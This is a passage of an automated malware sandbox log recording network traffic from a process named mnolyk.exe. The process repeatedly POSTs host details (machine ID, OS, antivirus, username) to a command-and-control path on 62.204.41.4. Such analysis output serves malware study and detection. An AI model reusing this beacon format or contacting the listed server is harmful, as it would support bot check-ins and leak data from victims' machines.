                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      563192.168.2.75029162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:30.738198042 CET1023OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.802054882 CET1023INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      564192.168.2.75029262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:30.970170975 CET1024OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.033524036 CET1024INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      565192.168.2.75029362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:31.205771923 CET1025OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.270173073 CET1025INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      566192.168.2.75029462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:31.479058981 CET1026OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.543909073 CET1026INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      567192.168.2.75029562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:31.730773926 CET1027OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.795362949 CET1027INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      568192.168.2.75029662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:31.975155115 CET1028OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.041707039 CET1028INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      569192.168.2.75029762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:32.224802017 CET1029OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.290158987 CET1029INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      57192.168.2.74978262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:11.473355055 CET495OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.537575960 CET496INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      570192.168.2.75029862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:32.460706949 CET1030OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.526222944 CET1030INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      571192.168.2.75029962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:32.713859081 CET1031OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.777806044 CET1031INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      572192.168.2.75030062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:32.957645893 CET1032OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.021564960 CET1032INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      573192.168.2.75030162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:33.190298080 CET1033OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.258894920 CET1033INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      574192.168.2.75030262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:33.426502943 CET1034OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.490863085 CET1034INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      575192.168.2.75030362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:33.662983894 CET1035OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.727881908 CET1035INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      576192.168.2.75030462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:33.925232887 CET1036OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.989304066 CET1036INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      577192.168.2.75030562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:34.163427114 CET1037OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.229917049 CET1037INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      578192.168.2.75030662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:34.417912006 CET1038OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.481225967 CET1038INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      579192.168.2.75030762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:34.659310102 CET1039OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.725996971 CET1039INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      58192.168.2.74978362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:11.707389116 CET496OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.770190954 CET497INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      580192.168.2.75030862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:34.900026083 CET1040OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
